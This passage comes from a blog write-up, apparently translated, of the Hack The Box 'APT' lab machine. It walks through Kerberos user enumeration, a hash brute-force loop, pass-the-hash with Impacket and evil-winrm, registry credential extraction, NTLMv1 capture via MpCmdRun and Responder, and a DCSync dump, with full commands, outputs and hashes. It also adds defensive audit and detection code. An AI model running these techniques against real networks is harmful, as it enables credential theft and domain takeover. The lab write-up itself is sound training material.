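        entries.append(e)
    return entries


def user_and_hash_lists(entries):
    """The same split the two awk commands above produce: user_list and hash_list."""
    users = [e["user"] for e in entries]
    hashes = [f"{e['lm']}:{e['nt']}" for e in entries]
    return users, hashes


def audit(entries):
    """Findings a defender wants from such a dump: accounts with an empty password,
    accounts still storing an LM hash, and NT hashes shared by several accounts
    (the same password reused, so one cracked or passed hash opens all of them)."""
    shared = Counter(e["nt"] for e in entries if not e["empty_password"])
    return {
        "empty_password": sorted(e["user"] for e in entries if e["empty_password"]),
        "lm_stored": sorted(e["user"] for e in entries if e["lm_stored"]),
        "reused_nt": {
            h: sorted(e["user"] for e in entries if e["nt"] == h)
            for h, n in shared.items() if n > 1
        },
    }


# Constructed sample in the format shown above; the non-empty hash values are
# made up and are not the ones from the box.
SAMPLE = """Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x00000000000000000000000000000000
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
htb.local\\alice.smith:3200:0123456789abcdef0123456789abcdef:11111111111111111111111111111111:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:4444444444444444444444444444444444444444444444444444444444444444
"""

if __name__ == "__main__":
    entries = parse_secretsdump(SAMPLE)
    users, hashes = user_and_hash_lists(entries)
    print("user_list:", users)
    print("hash_list:", hashes)
    print("audit:", audit(entries))
```

Running it against the real user_hash_raw file only needs open("user_hash_raw").read() in place of SAMPLE.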

Next we want to match hashes against accounts. Since the data set is large, we first filter for valid usernames.

Kerbrute User Enumeration

This relies on the Kerberos pre-authentication mechanism; it is worth revisiting the AS_REQ stage of the Kerberos protocol. The tool we use here is Kerbrute.

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ ./kerbrute_linux_amd64 userenum -d htb.local --dc htb.local user_list

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 10/31/23 - Ronnie Flathers @ropnop

2023/10/31 09:42:46 > Using KDC(s):
2023/10/31 09:42:46 > htb.local:88

2023/10/31 09:42:51 > [+] VALID USERNAME: Administrator@htb.local
2023/10/31 09:42:51 > [+] VALID USERNAME: APT$@htb.local
2023/10/31 09:46:43 > [+] VALID USERNAME: henry.vinson@htb.local
2023/10/31 10:00:03 > Done! Tested 2000 usernames (3 valid) in 1037.577 seconds

This takes quite a while; we can also cross-check with an nmap script:

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ sudo nmap -6 -p88 --script=krb5-enum-users --script-args krb5-enum-users.realm='htb.local',userdb=user_list htb.local
[sudo] password for i3eg1nner:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-31 10:07 EDT
Nmap scan report for htb.local (dead:beef::b885:d62a:d679:573f)
Host is up (0.079s latency).

PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| Administrator@htb.local
| APT$@htb.local
|_ henry.vinson@htb.local

Nmap done: 1 IP address (1 host up) scanned in 17.14 seconds

The results agree, and the nmap scan is much faster.

Next I tried the crackmapexec tool for pass-the-hash against smb, ldap and winrm. Here the 红队笔记 uploader triggered a protection mechanism and got their IP banned, so only a screenshot is kept here as a note.

So this tool cannot be used for brute-forcing directly. The official HTB write-up notes that Kerbrute doesn't support bruteforcing hashes and therefore switches tools. There is a Chinese explanation worth reading, 渗透技巧——通过Kerberos pre-auth进行用户枚举和口令爆破 (3gstudent.github.io), but it still requires modifying the script yourself, so we might as well continue with the 红队笔记 uploader's approach.

GetTGT Brute Force

For the matching we need the impacket-getTGT tool, and we write a script to drive it:

#!/bin/bash

# Feed every LM:NT pair from hash_list to impacket-getTGT for the one valid user
while IFS='' read -r LINE || [ -n "${LINE}" ]
do
    echo "------"
    echo "Feed the Hash:${LINE}"
    impacket-getTGT htb.local/henry.vinson@htb.local -hashes "${LINE}"
done < hash_list

If impacket-getTGT succeeds it writes a ticket file in the current directory, so we can watch the number of files in the directory and stop the script when it changes, rather than drowning in the script's output.

While reproducing this I hit a problem: the henry.vinson@apt.htb.ccache file was not generated as expected, and I was still drowning in output. What follows is the troubleshooting. Suppose that, by patiently digging through, we find the target hash; the output at that point looks like this:

------
Feed the Hash:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
------

With the keyword Clock skew too great we keep searching: Kerberoast - HackTricks

Another APT write-up also mentions this problem: Hack the Box - APT Writeup | Hacker's Rest (zweilosec.github.io)

That author found the cause was a clock synchronisation with another box done earlier while working on it... I suddenly realised I had made exactly the same mistake. Also, the APT box has no time synchronisation service; luckily I found that post, otherwise who knows how long troubleshooting would have taken.

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ sudo ntpdate pool.ntp.org
[sudo] password for i3eg1nner:
2023-10-31 05:18:23.410441 (-0400) -28790.653051 +/- 1.006571 pool.ntp.org 204.2.134.162 s3 no-leap
CLOCK: time stepped by -28790.653051
┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ impacket-getTGT -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Saving ticket in henry.vinson@htb.local.ccache

That was the unexpected cause. With hindsight, we could have searched the output for the keyword Saving ticket, or, if hitting the clock synchronisation problem as I did, for Clock skew. But what if I did not know either keyword? I tried changing the script's logic myself:

#!/bin/bash

while IFS='' read -r LINE || [ -n "${LINE}" ]
do
    echo "------"
    echo "Feed the Hash:${LINE}"
    # $? is grep's exit status: 0 when the output contains "invalid", 1 otherwise
    impacket-getTGT htb.local/henry.vinson@htb.local -hashes "${LINE}" | grep -q "invalid"
    if [ $? -eq 0 ]; then
        echo ""
    else
        echo "success!!!!"
        break
    fi
done < hash_list

Based on observing the error output, a check for the keyword invalid was added: if the keyword is absent, the attempt is treated as successful and the script stops.

Lateral Movement

Pass-the-Hash Attempts

Next we start trying pass-the-hash attacks.
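Added example (not from the original post or any project it cites): the defender's view of the Kerbrute user enumeration above and of the getTGT hash loop in this section, written as detection logic over Windows Security event records. A userenum run produces a burst of 4768 events with result 0x6 (principal unknown) from one source, a hash loop produces a burst of 4771 events with failure code 0x18 (pre-authentication failed) for one existing account, and the clock problem hit above shows up as 0x25 (KRB_AP_ERR_SKEW), which is a client clock fault and not a bad credential. The log records, source IPs and thresholds are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Kerberos result codes as they appear in the Status / Failure Code field of
# Windows Security events 4768 (TGT requested) and 4771 (pre-auth failed).
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # account does not exist: one userenum probe
KDC_ERR_PREAUTH_FAILED = "0x18"       # account exists, wrong key: one bad hash/password
KRB_AP_ERR_SKEW = "0x25"              # client clock too far from the KDC (the getTGT error above)


def parse_event(line):
    """Parse one constructed 'key=value ...' record into a dict with a datetime."""
    fields = dict(kv.split("=", 1) for kv in line.split())
    fields["time"] = datetime.strptime(fields["time"], "%Y-%m-%dT%H:%M:%S")
    return fields


def detect(lines, window=timedelta(minutes=10), enum_threshold=20, brute_threshold=10):
    """Return (kind, source_ip, detail) findings.

    userenum:      one source asks for >= enum_threshold distinct non-existent
                   principals (4768 / 0x6) within one window.
    preauth_brute: one source fails pre-authentication >= brute_threshold times
                   for the same existing account (4771 / 0x18) within one window.
    clock_skew:    every 0x25 is reported on its own; it is a client clock
                   problem, not a wrong credential, so it must not feed the counters.
    """
    events = sorted((parse_event(ln) for ln in lines), key=lambda e: e["time"])
    unknown = defaultdict(list)  # ip -> [(time, user)]
    failed = defaultdict(list)   # (ip, user) -> [time]
    findings = []
    for e in events:
        ip, user, code = e["ip"], e["user"], e["code"]
        if code == KRB_AP_ERR_SKEW:
            findings.append(("clock_skew", ip, user))
        elif e["id"] == "4768" and code == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown[ip].append((e["time"], user))
        elif e["id"] == "4771" and code == KDC_ERR_PREAUTH_FAILED:
            failed[(ip, user)].append(e["time"])
    # Sliding window over the time-sorted hits: count distinct names / attempts
    # starting at each hit, and report the source once a threshold is reached.
    for ip, hits in unknown.items():
        for i, (start, _) in enumerate(hits):
            names = {u for t, u in hits[i:] if t - start <= window}
            if len(names) >= enum_threshold:
                findings.append(("userenum", ip, f"{len(names)} unknown principals"))
                break
    for (ip, user), times in failed.items():
        for i, start in enumerate(times):
            n = sum(1 for t in times[i:] if t - start <= window)
            if n >= brute_threshold:
                findings.append(("preauth_brute", ip, f"{user}: {n} pre-auth failures"))
                break
    return findings


def sample_lines():
    """Constructed records modelled on this box: a userenum run over user_list,
    a hash loop against henry.vinson, one client with a skewed clock, and one
    ordinary typo by a real user that must not be flagged."""
    base = datetime(2023, 10, 31, 9, 42, 0)
    fmt = "time={:%Y-%m-%dT%H:%M:%S} id={} ip={} user={} code={}"
    lines = []
    for i in range(25):  # 25 names from user_list that do not exist
        lines.append(fmt.format(base + timedelta(seconds=i), 4768, "10.10.14.5", f"bogus{i}", "0x6"))
    lines.append(fmt.format(base + timedelta(seconds=30), 4768, "10.10.14.5", "henry.vinson", "0x0"))
    for i in range(12):  # 12 wrong hashes for the one valid account
        lines.append(fmt.format(base + timedelta(minutes=30, seconds=i), 4771, "10.10.14.5", "henry.vinson", "0x18"))
    lines.append(fmt.format(base + timedelta(minutes=48), 4768, "10.10.14.9", "henry.vinson", "0x25"))
    lines.append(fmt.format(base + timedelta(hours=2), 4771, "10.10.20.7", "jeb.sloan", "0x18"))
    return lines


if __name__ == "__main__":
    for finding in detect(sample_lines()):
        print(finding)
```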

// evil-winrm pass-the-hash only needs the NTLM hash
evil-winrm -i htb.local -u henry.vinson -H 'e53d87d42adaa3ca32bdb34a876cbffb'

psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local

 Impacket's implementation creates a remote service by uploading a randomly-named executable to the hidden Windows ADMIN$ share, registering a service via RPC and the Windows Service Control Manager, and then communicating over a named pipe. And it will often get caught by antivirus. Psexec requires credentials for a user with local administrator privileges or higher since reading/writing to the ADMIN$ share is required.
 use the exit command instead of ctrl + C

wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local

Wmiexec.py runs commands as the authenticated local administrator, rather than NT AUTHORITY\SYSTEM. Wmiexec.py uses the Windows Management Instrumentation and DCOM to create a Windows process to run commands. Like some of the above methods, it writes the output out to a temp file in an SMB share (ADMIN$ by default) and then retrieves the output and deletes the file.

dcomexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local

Dcomexec.py uses the Distributed Component Object Model (DCOM) to execute commands.

smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local

smbexec creates a batch file for each command that you run, then creates a service to run the file using cmd.exe. It redirects STDOUT and STDERR to a temporary file on a readable SMB share. This will generate a lot of Windows event logs since you're creating and deleting a lot of services.

reg.py

reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\

This Impacket script is ripped straight out of the reg.exe of the Windows OS. Reg.exe is an executable that can read, modify and delete registry values when used with the combination of the query, add and delete keywords respectively. We cannot even begin to express the importance of access to the registry. The registry controls each and every aspect of the system. It can be used to gain information about the various policies and software, and also to alter some of those policies.

The HKU hive mainly stores user-related information, including credential-related data, so we start by querying HKU.

┌──(i3eg1nner㉿racknerd-4565a8)-[~]
└─$ impacket-reg -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\
HKU\\Console
HKU\\Control Panel
HKU\\Environment
HKU\\Keyboard Layout
HKU\\Network
HKU\\Software
HKU\\System
HKU\\Volatile Environment

HKU contains information about both users and software, so we look at Software first. Enumerating the registry turns up GiganticHostingManagementSystem, a name that matches the title of the web page, so we keep digging there.

┌──(i3eg1nner㉿racknerd-4565a8)-[~]
└─$ impacket-reg -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software\\
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\
HKU\Software\\GiganticHostingManagementSystem
HKU\Software\\Microsoft
HKU\Software\\Policies
HKU\Software\\RegisteredApplications
HKU\Software\\Sysinternals
HKU\Software\\VMware, Inc.
HKU\Software\\Wow6432Node
HKU\Software\\Classes

You can also run impacket-reg -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU -s to list every key and value under HKU recursively.

This reveals a username and password:

┌──(i3eg1nner㉿racknerd-4565a8)-[~]
└─$ impacket-reg -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software\\GiganticHostingManagementSystem\\
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\Software\GiganticHostingManagementSystem\
UserName REG_SZ henry.vinson_adm
PassWord REG_SZ G1#Ny5@2dvht

Getshell

Use this username and password to continue lateral movement.

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ evil-winrm -i htb.local -u henry.vinson_adm -p G1#Ny5@2dvht

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents>

Shell obtained; the flag is on the Desktop.

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> dir C:\Users


Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/24/2020 7:54 AM Administrator
d----- 9/24/2020 8:39 AM henry.vinson
d----- 9/24/2020 8:40 AM henry.vinson_adm
d-r--- 11/21/2016 2:39 AM Public

Privilege Escalation

Poke around to see which privilege escalation paths exist.

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> dir C:\


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/24/2020 8:30 AM backup
d----- 9/24/2020 8:19 AM inetpub
d----- 9/16/2020 7:45 PM PerfLogs
d-r--- 10/22/2020 5:52 PM Program Files
d----- 11/21/2016 2:36 AM Program Files (x86)
d----- 9/24/2020 11:05 AM scripts
d-r--- 9/24/2020 8:40 AM Users
d----- 3/17/2021 3:33 PM Windows

The backup directory is the share we obtained earlier via SMB.

*Evil-WinRM* PS C:\backup> dir


Directory: C:\backup


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/24/2020 8:30 AM 10650961 backup.zip

What follows is more digging around. Under Windows Defender we find MpCmdRun.exe; its abuse is documented at Mpcmdrun | LOLBAS (lolbas-project.github.io) and belongs to the living-off-the-land idea. Here, though, we are not using it to download a file but to make an outbound connection; see the Microsoft documentation: Use the command line to manage Microsoft Defender Antivirus | Microsoft Learn.

MpCmdRun.exe -Scan -ScanType 3 -File \\$IP\noextist

History File

Using the file-inclusion directory list from Auto_Words and searching for the keyword passwhistory, we found:

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> type C:/users/henry.vinson_adm/appdata/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}

Two things here deserve attention: the administrator credential being obtained, and lmcompatibilitylevel being set to 2. Searching for the keywords lmcompatibilitylevel 2, the first result is Microsoft's official documentation.

It states that the client uses NTLMv1 authentication, while the server can use NTLMv1 or NTLMv2. NTLMv1 is in fact crackable, so there is something we can do here; the tool used is responder.

NTLMv1 attack using responder

NTLM - HackTricks describes the NTLMv1 attack, and Windows下的密码hash——Net-NTLMv1介绍 (3gstudent.github.io) gives a rough introduction to the underlying principle.

responder is installed by default on Kali; its configuration file is /etc/responder/Responder.conf. Change the challenge value in the configuration to 1122334455667788.

Note: when a hostname is entered, the hosts file is consulted first, then the DNS cache, then the DNS server, and finally the three local name-resolution protocols are used on the local network (a logic similar to ARP). Recommended reading: 内网渗透之Responder攻防(上) - FreeBuf网络安全行业门户.

First, start responder on the attacking machine.

┌──(i3eg1nner㉿racknerd-4565a8)-[~]
└─$ sudo responder --lm -I tun0 -v

Then use MpCmdRun to make the connection.

*Evil-WinRM* PS C:\Program Files\Windows Defender> MpCmdRun.exe -Scan -ScanType 3 -File \\10.10.14.2\noextist

Again with the help of a tool, parse the captured value.

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt/ntlmv1-multi]
└─$ python ntlmv1.py --ntlmv1 APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
Hashfield Split:
['APT$', '', 'HTB', '95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384', '95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384', '1122334455667788']

Hostname: HTB
Username: APT$
Challenge: 1122334455667788
LM Response: 95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384
NT Response: 95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384
CT1: 95ACA8C7248774CB
CT2: 427E1AE5B8D5CE68
CT3: 30A49B5BB858D384

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin 30A49B5BB858D384 1122334455667788

To crack with hashcat create a file with the following contents:
95ACA8C7248774CB:1122334455667788
427E1AE5B8D5CE68:1122334455667788

echo "95ACA8C7248774CB:1122334455667788">>14000.hash
echo "427E1AE5B8D5CE68:1122334455667788">>14000.hash

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
NTHASH:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384

NTLMv1 Hash Cracking

Tried the crack.sh site to obtain it, but the site was down for maintenance, unfortunately. Tried hashcat: the command given above does not run as-is, and a fix was found in DES Full charset error (hashcat.net).

.\hashcat.exe -m 14000 -1 charsets/DES_full.hcchr -a 3 --hex-charset userpasswdhash ?1?1?1?1?1?1?1?1

But the cracking takes far too long... For now, I will just use the result someone else obtained through the site, and ask around later for other approaches.

// NT hash of APT$
d167c3238864b12f5f82feae86a7f798

secretsdump DCSync Attack

Note that even if we can log in as APT$, that by itself is not much help in taking over the whole domain controller. Recalling the unusable hashes in the earlier backup archive, we can try impacket-secretsdump to obtain credentials. This is essentially a DCSync attack.

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt/ntlmv1-multi]
└─$ sudo impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798 'htb.local/APT$@htb.local'
[sudo] password for i3eg1nner:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef:::
APT$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
Administrator:des-cbc-md5:0816d9d052239b8a
krbtgt:aes256-cts-hmac-sha1-96:b63635342a6d3dce76fcbca203f92da46be6cdd99c67eb233d0aaaaaa40914bb
krbtgt:aes128-cts-hmac-sha1-96:7735d98abc187848119416e08936799b
krbtgt:des-cbc-md5:f8c26238c2d976bf
henry.vinson:aes256-cts-hmac-sha1-96:63b23a7fd3df2f0add1e62ef85ea4c6c8dc79bb8d6a430ab3a1ef6994d1a99e2
henry.vinson:aes128-cts-hmac-sha1-96:0a55e9f5b1f7f28aef9b7792124af9af
henry.vinson:des-cbc-md5:73b6f71cae264fad
henry.vinson_adm:aes256-cts-hmac-sha1-96:f2299c6484e5af8e8c81777eaece865d54a499a2446ba2792c1089407425c3f4
henry.vinson_adm:aes128-cts-hmac-sha1-96:3d70c66c8a8635bdf70edf2f6062165b
henry.vinson_adm:des-cbc-md5:5df8682c8c07a179
APT$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454
APT$:aes128-cts-hmac-sha1-96:bf1c1795c63ab278384f2ee1169872d9
APT$:des-cbc-md5:76c45245f104a4bf
[*] Cleaning up...

evil-winrm Login

With the administrator hash obtained, try logging in with evil-winrm.

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt/ntlmv1-multi]
└─$ evil-winrm -i htb.local -u administrator -H 'c370bddf384a691d811ff3495e8a72e2'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/1/2023 4:57 AM 34 root.txt

Success.

*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet:

Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::16c
IPv6 Address. . . . . . . . . . . : dead:beef::b885:d62a:d679:573f
IPv6 Address. . . . . . . . . . . : dead:beef::dc2a:6438:2e17:c0f3
Link-local IPv6 Address . . . . . : fe80::dc2a:6438:2e17:c0f3%5
IPv4 Address. . . . . . . . . . . : 10.10.10.213
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : dead:beef::1
fe80::250:56ff:feb9:381e%5
10.10.10.2

Learning Internal Network Penetration Starting from the APT Box
https://i3eg1nner.github.io/2023/10/4af173e66943.html
Author
I3eg1nner
Published on
October 29, 2023
License